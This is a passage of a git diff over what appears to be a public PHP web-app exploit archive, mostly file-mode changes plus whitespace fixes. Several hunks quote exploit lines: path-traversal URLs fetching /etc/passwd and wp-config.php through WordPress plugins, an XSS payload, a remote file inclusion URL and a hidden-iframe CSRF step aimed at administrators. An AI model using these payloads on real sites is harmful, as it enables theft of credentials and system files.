b/platforms/php/webapps/18700.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18701.txt b/platforms/php/webapps/18701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18702.txt b/platforms/php/webapps/18702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18708.txt b/platforms/php/webapps/18708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1871.txt b/platforms/php/webapps/1871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18711.txt b/platforms/php/webapps/18711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1872.txt b/platforms/php/webapps/1872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18720.txt b/platforms/php/webapps/18720.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18725.txt b/platforms/php/webapps/18725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18728.txt b/platforms/php/webapps/18728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18729.txt b/platforms/php/webapps/18729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18732.txt b/platforms/php/webapps/18732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18736.txt b/platforms/php/webapps/18736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18737.txt b/platforms/php/webapps/18737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1874.php b/platforms/php/webapps/1874.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18741.txt b/platforms/php/webapps/18741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18742.php b/platforms/php/webapps/18742.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18743.txt b/platforms/php/webapps/18743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1875.htm b/platforms/php/webapps/1875.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18752.txt b/platforms/php/webapps/18752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18753.txt b/platforms/php/webapps/18753.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18768.txt b/platforms/php/webapps/18768.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1877.php b/platforms/php/webapps/1877.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18770.txt b/platforms/php/webapps/18770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18772.txt b/platforms/php/webapps/18772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18773.txt b/platforms/php/webapps/18773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18775.php b/platforms/php/webapps/18775.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18778.txt b/platforms/php/webapps/18778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1878.txt b/platforms/php/webapps/1878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18782.txt b/platforms/php/webapps/18782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18787.txt b/platforms/php/webapps/18787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18788.txt b/platforms/php/webapps/18788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1879.txt b/platforms/php/webapps/1879.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18791.txt b/platforms/php/webapps/18791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18793.txt b/platforms/php/webapps/18793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18798.txt b/platforms/php/webapps/18798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18800.txt b/platforms/php/webapps/18800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18801.txt b/platforms/php/webapps/18801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18803.txt b/platforms/php/webapps/18803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18804.txt b/platforms/php/webapps/18804.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18806.txt b/platforms/php/webapps/18806.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18809.txt b/platforms/php/webapps/18809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1881.txt b/platforms/php/webapps/1881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18813.txt b/platforms/php/webapps/18813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18814.txt b/platforms/php/webapps/18814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18815.txt b/platforms/php/webapps/18815.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18820.php b/platforms/php/webapps/18820.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18822.txt b/platforms/php/webapps/18822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18827.txt b/platforms/php/webapps/18827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18828.txt b/platforms/php/webapps/18828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1883.txt b/platforms/php/webapps/1883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18832.txt b/platforms/php/webapps/18832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18842.txt b/platforms/php/webapps/18842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18843.txt b/platforms/php/webapps/18843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18844.txt b/platforms/php/webapps/18844.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18845.txt b/platforms/php/webapps/18845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18850.txt b/platforms/php/webapps/18850.txt old mode 100755 new mode 100644 index b23308a40..906ce2dee --- a/platforms/php/webapps/18850.txt +++ b/platforms/php/webapps/18850.txt @@ -23,4 +23,4 @@ Replace http://xxxxxxxxx.com/x7path/ to your target url. Dont forget replace YOU add this code to inside body tag of main html page: <iframe style="display:none;" src="frame.html"></iframe> -and... upload main page and frame.html . Send main page url to any administrator. \ No newline at end of file +and... upload main page and frame.html . Send main page url to any administrator. \ No newline at end of file diff --git a/platforms/php/webapps/18857.txt b/platforms/php/webapps/18857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18858.txt b/platforms/php/webapps/18858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1886.txt b/platforms/php/webapps/1886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18868.txt b/platforms/php/webapps/18868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1887.txt b/platforms/php/webapps/1887.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18871.txt b/platforms/php/webapps/18871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18872.txt b/platforms/php/webapps/18872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18873.txt b/platforms/php/webapps/18873.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18874.txt b/platforms/php/webapps/18874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18875.txt b/platforms/php/webapps/18875.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1888.txt b/platforms/php/webapps/1888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18882.txt b/platforms/php/webapps/18882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18884.txt b/platforms/php/webapps/18884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18886.txt b/platforms/php/webapps/18886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18889.txt b/platforms/php/webapps/18889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18899.txt b/platforms/php/webapps/18899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1890.txt b/platforms/php/webapps/1890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18900.txt b/platforms/php/webapps/18900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18908.txt b/platforms/php/webapps/18908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1891.txt b/platforms/php/webapps/1891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18911.txt b/platforms/php/webapps/18911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18912.txt b/platforms/php/webapps/18912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18913.php b/platforms/php/webapps/18913.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18921.txt b/platforms/php/webapps/18921.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18927.txt b/platforms/php/webapps/18927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18935.txt b/platforms/php/webapps/18935.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18937.txt b/platforms/php/webapps/18937.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18941.txt b/platforms/php/webapps/18941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18944.txt b/platforms/php/webapps/18944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18948.txt b/platforms/php/webapps/18948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1895.txt b/platforms/php/webapps/1895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18950.txt b/platforms/php/webapps/18950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18953.txt b/platforms/php/webapps/18953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18955.txt b/platforms/php/webapps/18955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1896.txt b/platforms/php/webapps/1896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18960.txt b/platforms/php/webapps/18960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18961.txt b/platforms/php/webapps/18961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18965.html b/platforms/php/webapps/18965.html old mode 100755 new mode 100644 index 6aab9fc37..1add10849 --- a/platforms/php/webapps/18965.html +++ b/platforms/php/webapps/18965.html @@ -47,6 +47,4 @@ CSRF (Add Reseller) </body> </html> -################################################################################## - - \ No newline at end of file +################################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/1897.txt b/platforms/php/webapps/1897.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18970.txt b/platforms/php/webapps/18970.txt old mode 100755 new mode 100644 index 88954d1d6..0ec25e1c0 --- a/platforms/php/webapps/18970.txt +++ b/platforms/php/webapps/18970.txt @@ -45,4 +45,4 @@ search.php?req='--></style></script><script>alert(0x0002BC)</script> #+--------------------------------------------------+# #[�] Greetz to : sec4ever # -#---------------------------------------------------+# \ No newline at end of file +#---------------------------------------------------+# \ No newline at end of file diff --git a/platforms/php/webapps/18974.txt b/platforms/php/webapps/18974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18979.txt b/platforms/php/webapps/18979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1898.txt b/platforms/php/webapps/1898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18980.txt b/platforms/php/webapps/18980.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18983.php b/platforms/php/webapps/18983.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18985.txt b/platforms/php/webapps/18985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18987.php b/platforms/php/webapps/18987.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18988.php b/platforms/php/webapps/18988.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18989.php b/platforms/php/webapps/18989.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1899.txt b/platforms/php/webapps/1899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18990.php b/platforms/php/webapps/18990.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18991.php b/platforms/php/webapps/18991.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18993.php b/platforms/php/webapps/18993.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18994.php b/platforms/php/webapps/18994.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18997.php b/platforms/php/webapps/18997.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18998.php b/platforms/php/webapps/18998.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18999.php b/platforms/php/webapps/18999.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19003.txt b/platforms/php/webapps/19003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19005.txt b/platforms/php/webapps/19005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19007.php b/platforms/php/webapps/19007.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19008.php b/platforms/php/webapps/19008.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19009.php b/platforms/php/webapps/19009.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19011.txt b/platforms/php/webapps/19011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19012.txt b/platforms/php/webapps/19012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19013.txt b/platforms/php/webapps/19013.txt old mode 100755 new mode 100644 index 2574e1921..bf6de0502 --- a/platforms/php/webapps/19013.txt +++ b/platforms/php/webapps/19013.txt @@ -13,4 +13,4 @@ http://www.opensyscom.fr Exploit : -http://www.exemple.com/wordpress/wp-content/plugins/easy-contact-forms-exporter/downloadcsv.php?file=../etc/passwd \ No newline at end of file +http://www.exemple.com/wordpress/wp-content/plugins/easy-contact-forms-exporter/downloadcsv.php?file=../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/19016.txt b/platforms/php/webapps/19016.txt old mode 100755 new mode 100644 index e2f7aaf4d..ab4be268b --- a/platforms/php/webapps/19016.txt +++ b/platforms/php/webapps/19016.txt @@ -15,4 +15,4 @@ Exploit : http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php -http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd \ No newline at end of file +http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/19018.txt b/platforms/php/webapps/19018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19019.php b/platforms/php/webapps/19019.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1902.txt b/platforms/php/webapps/1902.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19020.txt b/platforms/php/webapps/19020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19021.txt b/platforms/php/webapps/19021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19022.txt b/platforms/php/webapps/19022.txt old mode 100755 new mode 100644 index a666ab9b6..adb51433d --- a/platforms/php/webapps/19022.txt +++ b/platforms/php/webapps/19022.txt @@ -16,4 +16,4 @@ Exploit : http://www.exemple.com/wordpress/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php -http://www.exemple.com/wordpress/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../../../../../etc/passwd \ No newline at end of file +http://www.exemple.com/wordpress/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/19023.php b/platforms/php/webapps/19023.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1903.txt b/platforms/php/webapps/1903.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19031.txt b/platforms/php/webapps/19031.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19035.txt b/platforms/php/webapps/19035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19036.php b/platforms/php/webapps/19036.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1904.php b/platforms/php/webapps/1904.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1905.txt b/platforms/php/webapps/1905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19050.txt b/platforms/php/webapps/19050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19051.txt b/platforms/php/webapps/19051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19052.txt b/platforms/php/webapps/19052.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19053.txt b/platforms/php/webapps/19053.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19054.txt b/platforms/php/webapps/19054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19055.txt b/platforms/php/webapps/19055.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19056.txt b/platforms/php/webapps/19056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19057.txt b/platforms/php/webapps/19057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19058.txt b/platforms/php/webapps/19058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19059.php b/platforms/php/webapps/19059.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19060.php b/platforms/php/webapps/19060.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1907.txt b/platforms/php/webapps/1907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1908.txt b/platforms/php/webapps/1908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1912.txt b/platforms/php/webapps/1912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1913.txt b/platforms/php/webapps/1913.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19132.txt b/platforms/php/webapps/19132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19133.txt b/platforms/php/webapps/19133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19134.txt b/platforms/php/webapps/19134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19135.txt b/platforms/php/webapps/19135.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1914.txt b/platforms/php/webapps/1914.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1916.txt b/platforms/php/webapps/1916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19178.txt b/platforms/php/webapps/19178.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19179.txt b/platforms/php/webapps/19179.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1918.php b/platforms/php/webapps/1918.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19180.txt b/platforms/php/webapps/19180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19187.txt b/platforms/php/webapps/19187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19188.txt b/platforms/php/webapps/19188.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19189.txt b/platforms/php/webapps/19189.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1919.txt b/platforms/php/webapps/1919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1920.php b/platforms/php/webapps/1920.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1922.php b/platforms/php/webapps/1922.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1923.txt b/platforms/php/webapps/1923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1925.txt b/platforms/php/webapps/1925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1926.txt b/platforms/php/webapps/1926.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19264.txt b/platforms/php/webapps/19264.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1928.txt b/platforms/php/webapps/1928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1929.txt b/platforms/php/webapps/1929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19292.txt b/platforms/php/webapps/19292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19294.txt b/platforms/php/webapps/19294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1932.php b/platforms/php/webapps/1932.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19324.txt b/platforms/php/webapps/19324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19325.txt b/platforms/php/webapps/19325.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19329.txt b/platforms/php/webapps/19329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1933.txt b/platforms/php/webapps/1933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19330.txt b/platforms/php/webapps/19330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1934.txt b/platforms/php/webapps/1934.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1936.txt b/platforms/php/webapps/1936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19381.php b/platforms/php/webapps/19381.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19386.txt b/platforms/php/webapps/19386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1939.php b/platforms/php/webapps/1939.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19398.txt b/platforms/php/webapps/19398.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19400.txt b/platforms/php/webapps/19400.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19408.txt b/platforms/php/webapps/19408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1941.php b/platforms/php/webapps/1941.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1942.txt b/platforms/php/webapps/1942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1943.txt b/platforms/php/webapps/1943.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19431.txt b/platforms/php/webapps/19431.txt old mode 100755 new mode 100644 index ab1b932b0..52518fb4c --- a/platforms/php/webapps/19431.txt +++ b/platforms/php/webapps/19431.txt @@ -86,10 +86,4 @@ # # Vuln: http://localhost/webERP/includes/LanguageSetup.php?PathPrefix=http://localhost/phpinfo.txt? # - ### [ dun / 2012 ] ##################################################### - - - - - - \ No newline at end of file + ### [ dun / 2012 ] ##################################################### \ No newline at end of file diff --git a/platforms/php/webapps/19452.txt b/platforms/php/webapps/19452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1946.php b/platforms/php/webapps/1946.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1948.txt b/platforms/php/webapps/1948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19481.txt b/platforms/php/webapps/19481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1951.txt b/platforms/php/webapps/1951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1952.txt b/platforms/php/webapps/1952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19524.txt b/platforms/php/webapps/19524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19548.txt b/platforms/php/webapps/19548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19549.txt b/platforms/php/webapps/19549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1955.txt b/platforms/php/webapps/1955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19550.txt b/platforms/php/webapps/19550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1956.txt b/platforms/php/webapps/1956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19572.txt b/platforms/php/webapps/19572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19573.php b/platforms/php/webapps/19573.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19574.txt b/platforms/php/webapps/19574.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1959.txt b/platforms/php/webapps/1959.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19597.txt b/platforms/php/webapps/19597.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19598.txt b/platforms/php/webapps/19598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1960.php b/platforms/php/webapps/1960.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19600.txt b/platforms/php/webapps/19600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1961.txt b/platforms/php/webapps/1961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19626.txt b/platforms/php/webapps/19626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19628.txt b/platforms/php/webapps/19628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19629.txt b/platforms/php/webapps/19629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1963.txt b/platforms/php/webapps/1963.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1964.php b/platforms/php/webapps/1964.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1968.php b/platforms/php/webapps/1968.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1969.txt b/platforms/php/webapps/1969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1970.txt b/platforms/php/webapps/1970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1971.txt b/platforms/php/webapps/1971.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19715.txt b/platforms/php/webapps/19715.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1974.txt b/platforms/php/webapps/1974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19768.txt b/platforms/php/webapps/19768.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19769.txt b/platforms/php/webapps/19769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19771.txt b/platforms/php/webapps/19771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19775.txt b/platforms/php/webapps/19775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19790.txt b/platforms/php/webapps/19790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19791.txt b/platforms/php/webapps/19791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19792.txt b/platforms/php/webapps/19792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19793.txt b/platforms/php/webapps/19793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1981.txt b/platforms/php/webapps/1981.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1982.txt b/platforms/php/webapps/1982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19825.php b/platforms/php/webapps/19825.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19829.txt b/platforms/php/webapps/19829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1983.txt b/platforms/php/webapps/1983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19863.txt b/platforms/php/webapps/19863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19864.txt b/platforms/php/webapps/19864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19865.txt b/platforms/php/webapps/19865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19898.txt b/platforms/php/webapps/19898.txt old mode 100755 new mode 100644 index e9af14817..0f03dc85d --- a/platforms/php/webapps/19898.txt +++ b/platforms/php/webapps/19898.txt @@ -57,4 +57,4 @@ Do some input validation. ------------------------------------- -################################################# \ No newline at end of file +################################################# \ No newline at end of file diff --git a/platforms/php/webapps/1991.php b/platforms/php/webapps/1991.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19927.html b/platforms/php/webapps/19927.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1993.php b/platforms/php/webapps/1993.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1994.txt b/platforms/php/webapps/1994.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1995.txt b/platforms/php/webapps/1995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1996.txt b/platforms/php/webapps/1996.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19964.txt b/platforms/php/webapps/19964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/19985.txt b/platforms/php/webapps/19985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20010.txt b/platforms/php/webapps/20010.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2003.txt b/platforms/php/webapps/2003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20044.txt b/platforms/php/webapps/20044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20055.txt b/platforms/php/webapps/20055.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2007.php b/platforms/php/webapps/2007.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2008.php b/platforms/php/webapps/2008.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20083.txt b/platforms/php/webapps/20083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2009.txt b/platforms/php/webapps/2009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2012.php b/platforms/php/webapps/2012.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20158.txt b/platforms/php/webapps/20158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20166.txt 